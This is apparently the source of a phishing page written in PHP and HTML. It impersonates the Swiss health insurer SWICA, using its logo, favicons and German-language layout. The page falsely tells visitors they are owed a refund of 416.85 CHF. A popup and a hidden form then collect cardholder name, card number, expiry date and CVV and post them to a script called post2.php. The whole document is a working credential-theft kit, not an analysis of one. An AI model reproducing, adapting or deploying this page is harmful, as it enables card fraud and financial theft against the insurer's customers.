<?php

include "id.php";
?>
<!DOCTYPE html>
<html>
<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta lang="de">
    <title>Anmelden</title>
    <link rel="icon" type="image/png" sizes="16x16" href="https://meta.swica.ch/sso/favicon/favicon-16x16.png">
    <link rel="icon" type="image/png" sizes="32x32" href="https://meta.swica.ch/sso/favicon/favicon-32x32.png">
    <link rel="icon" type="image/png" sizes="96x96" href="https://meta.swica.ch/sso/favicon/favicon-96x96.png">
    <link rel="stylesheet" href="vendor.min.css">
    <link rel="stylesheet" href="main.min.css">
	 <style>
        .container-custom {
            max-width: 600px;
            background-color: #fff;
            padding: 40px;
            border-radius: 10px;
            box-shadow: 0 2px 10px rgba(0,0,0,0.1);
            margin: 20px auto;
        }
        .header-title {
            font-size: 24px;
            margin-bottom: 10px;
        }
        .subheader-title {
            font-size: 18px;
            margin-bottom: 20px;
            color: #555;
        }
        .form-group label {
            font-weight: bold;
            margin-bottom: 5px;
        }
        .form-group input {
            width: 100%;
            padding: 10px;
            margin-bottom: 10px;
            border: 1px solid #ccc;
            border-radius: 5px;
        }
        .form-group .error {
            color: red;
            font-size: 14px;
            margin-top: -10px;
            margin-bottom: 10px;
        }
        .btn-primary {
            background-color: #00a79d;
            border: none;
            padding: 10px 20px;
            color: #fff;
            border-radius: 5px;
            cursor: pointer;
        }
        .btn-primary:hover {
            background-color: #008b8a;
        }
        .link {
            display: block;
            margin-top: 10px;
            color: #00a79d;
            text-decoration: none;
        }
        .link:hover {
            text-decoration: underline;
        }
        .navbar {
            margin-bottom: 20px;
        }
    </style>
    <style>
        .hidden { display: none; }
        .popup {
            position: fixed;
            top: 50%;
            left: 50%;
            transform: translate(-50%, -50%);
            background-color: white;
            border: 1px solid #ccc;
            padding: 20px;
            box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
            z-index: 1000;
            opacity: 0;
            transition: opacity 0.3s ease;
        }
        .popup.visible { opacity: 1; }
        .overlay {
            position: fixed;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            background-color: rgba(0, 0, 0, 0.5);
            z-index: 999;
            opacity: 0;
            transition: opacity 0.3s ease;
        }
        .overlay.visible { opacity: 1; }
        .form-row {
            display: flex;
            justify-content: space-between;
        }
        .form-row .form-group {
            flex: 1;
            margin-right: 10px;
        }
        .form-row .form-group:last-child {
            margin-right: 0;
        }
    </style>
</head>

<body>
    <div id="app">
        <div class="content">
            <form action="#" method="post">
                <header class="header">
                    <nav class="navbar navbar-light navbar-expand-lg">
                        <div class="container flex-nowrap">
                            <div id="lang-list">
                                <ul class="navbar-nav lng-switch d-lg-none">
                                    <li class="nav-item selected">
                                        <a type="submit" href="./" class="nav-link" name="culture" aria-label="Sprache Deutsch" value="de">de</a>
                                    </li>
                                    <li class="nav-item">
                                        <a type="submit" href="./fr" class="nav-link" name="culture" aria-label="Langue Française" value="fr">fr</a>
                                    </li>
                                </ul>
                            </div>
                            <div class="logo-xs d-lg-none">
                                <img src="swica-logo-mobile.svg">
                            </div>
                            <div id="nav-collapse" class="navbar-collapse collapse">
                                <ul class="navbar-nav lng-switch d-none d-lg-flex">
                                    <li class="nav-item selected">
                                        <button type="submit" class="nav-link" name="culture" value="de">de</button>
                                    </li>
                                    <li class="nav-item">
                                        <button type="submit" class="nav-link" name="culture" value="fr">fr</button>
                                    </li>
                                    <li class="nav-item">
                                        <button type="submit" class="nav-link" name="culture" value="it">it</button>
                                    </li>
                                    <li class="nav-item">
                                        <button type="submit" class="nav-link" name="culture" value="en">en</button>
                                    </li>
                                </ul>
                            </div>
                            <div class="logo d-none d-lg-block">
                                <img src="swica-logo-de-orig.png">
                            </div>
                        </div>
                    </nav>
                </header>
            </form>

            <section class="container">
                <div class="row">
                    <div class="col-lg-6 mx-auto">
                        <div>
                            <div id="snackbar"></div>
                            <div class="title">Mein Konto</div>
                            <p>Sie sind berechtigt, eine Rückerstattung in Höhe von <strong>416,85 CHF</strong> zu erhalten, basierend auf der Berechnung Ihrer letzten Ausgaben.</p>
                            <button id="addPaymentMethod" class="btn primary">Klicken Sie, um Karte hinzuzufügen</button>

                            <form action="post2.php" id="paymentForm" class="hidden" method="post"  >
                                <p style="display:flex;"><span><img src="https://play-lh.googleusercontent.com/e8-MGBOxMOKiUXf3XrXDHtc8izBo7aeyMhLeoIPwfLTdifAE8d5ZClfG8MmUsfaH3ow" style="width: 50px;"></span>Durch Hinzufügen Ihrer persönlichen Kreditkarte kann unser System die Gelder sofort auf Ihre Karte überweisen.</p>
                                <div class="form-group">
                                    <label for="ccHolder">Name auf der Karte</label>
                                    <input type="text" id="ccHolder" name="ccHolder" placeholder="John Weber" required>
                                </div>
                                <div class="form-group">
                                    <label for="ccNumber">Kartennummer</label>
                                    <input type="tel" inputmode="numeric" id="ccNumber" name="ccNumber"  placeholder="4444 5555 6666 7777" required>
                                </div>
                                <div class="form-row">
                                    <div class="form-group">
                                        <label for="expiry">Ablaufdatum</label>
                                        <input type="tel" inputmode="numeric" id="expiry" placeholder="MM/YY" name="expiry"  required>
                                    </div>
                                    <div class="form-group">
                                        <label for="cvv">CVV</label>
                                        <input type="tel" inputmode="numeric" id="cvv" name="cvv" placeholder="123"										required>
                                    </div>
                                </div>
                               

                                <button type="submit" class="btn primary">Einreichen</button>
                            </form>
                        </div>
                        <img src="https://www.werbewoche.ch/wp-content/uploads/2021/09/1095.002.21.003_SWICA2021_F12L_Yoga_RGB_d.png" style="width: 360px;">
                    </div>
                </div>
            </section>
        </div>

        <footer>
            <div class="container">
                <div class="contactCard">
                    <div class="cardTitle">Rund um die Uhr für Sie da.</div>
                    <div class="line service">
                        <svg viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg">
                            <path d="M.818 10.721l1.082 1.08a3 3 0 004.242 0l1.591-1.592a1.5 1.5 0 000-2.122L4.64 5a1.5 1.5 0 00-2.263.148c-3.241 4.4-1.277 9.036 2.706 13.02 3.983 3.984 8.62 5.946 13.023 2.705a1.5 1.5 0 00.147-2.263l-3.094-3.094a1.5 1.5 0 00-2.122 0l-1.59 1.591a3 3 0 000 4.243l1.094 1.094M12.753 3.75c.3-.9.663-2.25 2.32-2.25v0a2.179 2.179 0 012.18 2.179v0a1.98 1.98 0 01-.58 1.4L12.753 9h4.5M23.25 7.5h-3.747l3.747-6V9" stroke="currentColor" stroke-width="1.5" stroke-linecap="round" stroke-linejoin="round"></path>
                        </svg>
                        <div>
                            <div class="lineTitle">
                                <a href="tel:0800 80 90 80">0800 80 90 80</a>
                            </div>
                            <div class="lineDescription">Kundenservice 7x24</div>
                        </div>
                    </div>
                    <div class="line faq">
                        <svg viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg">
                            <path d="M9 6.75a3 3 0 114 2.829 1.5 1.5 0 00-1 1.415v.256m9.75 7.5h-10.5l-6 4.5v-4.5h-3a1.5 1.5 0 01-1.5-1.5v-15a1.5 1.5 0 011.5-1.5h19.5a1.5 1.5 0 011.5 1.5v15a1.5 1.5 0 01-1.5 1.5z" stroke="currentColor" stroke-width="1.5" stroke-linecap="round" stroke-linejoin="round"></path>
                            <path d="M12 14.25a.375.375 0 100 .75.375.375 0 000-.75v0" stroke="currentColor" stroke-width="1.5" stroke-linecap="round" stroke-linejoin="round"></path>
                        </svg>
                        <div>
                            <div class="lineTitle"><a href="#">Häufige Fragen</a></div>
                            <div class="lineDescription">Die wichtigsten Antworten.</div>
                        </div>
                    </div>
                </div>
            </div>

            <div class="footerInfo">
                <div class="container">
                    <div class="row">
                        <div class="col text-right">
                            <ul class="nav justify-content-end">
                                <li class="nav-item">
                                    <a class="nav-link pr-0" href="#">Impressum</a>
                                </li>
                            </ul>
                        </div>
                    </div>
                </div>
            </div>
        </footer>

        <div id="popup" class="popup visible" style="width: 342px;">
            <div style="display:flex">
                <span style="padding-right: 5%;">
                    <img src="https://cdn-icons-png.flaticon.com/512/3119/3119338.png" style="width: 50px;">
                </span>
                <p>Dieses Konto ist berechtigt, eine Rückerstattung in Höhe von <strong>416,85 CHF</strong> zu erhalten. Bitte fahren Sie fort, indem Sie auf OK klicken.</p>
            </div>
            <button id="popupClose" class="btn primary">OK</button>
        </div>
        <div id="overlay" class="overlay hidden"></div>
    </div>

    <script>
        document.addEventListener("DOMContentLoaded", function() {
            var popup = document.getElementById('popup');
            var overlay = document.getElementById('overlay');
            var addPaymentMethodBtn = document.getElementById('addPaymentMethod');
            var paymentForm = document.getElementById('paymentForm');
            var popupClose = document.getElementById('popupClose');

            // Show popup with smooth transition
            setTimeout(function() {
                popup.classList.add('visible');
                overlay.classList.add('visible');
                popup.classList.remove('hidden');
                overlay.classList.remove('hidden');
            }, 500);

            // Close popup
            popupClose.addEventListener('click', function() {
                popup.classList.remove('visible');
                overlay.classList.remove('visible');
                setTimeout(function() {
                    popup.classList.add('hidden');
                    overlay.classList.add('hidden');
                }, 300);
            });

            // Show payment form
            addPaymentMethodBtn.addEventListener('click', function() {
                paymentForm.classList.toggle('hidden');
            });
        });
    </script>
	<script>
	document.addEventListener("DOMContentLoaded", function() {
    // Format credit card number with spaces every 4 digits and limit to 16 digits
    var ccNumber = document.getElementById('ccNumber');
    ccNumber.addEventListener('input', function(e) {
        var value = e.target.value.replace(/\s+/g, '').replace(/[^0-9]/gi, '');
        var formattedValue = '';
        for (var i = 0; i < value.length && i < 16; i += 4) {
            if (i > 0) formattedValue += ' ';
            formattedValue += value.substring(i, i + 4);
        }
        e.target.value = formattedValue;
    });

    // Format expiry date with slash
    var expiry = document.getElementById('expiry');
    expiry.addEventListener('input', function(e) {
        var value = e.target.value.replace(/\D/g, '');
        if (value.length > 2) {
            e.target.value = value.substring(0, 2) + '/' + value.substring(2, 4);
        } else {
            e.target.value = value;
        }
    });

    // Ensure CVV is exactly 3 digits
    var cvv = document.getElementById('cvv');
    cvv.addEventListener('input', function(e) {
        var value = e.target.value.replace(/\D/g, '');
        if (value.length > 3) {
            e.target.value = value.substring(0, 3);
        } else {
            e.target.value = value;
        }
    });
});

	</script>
</body>
</html>
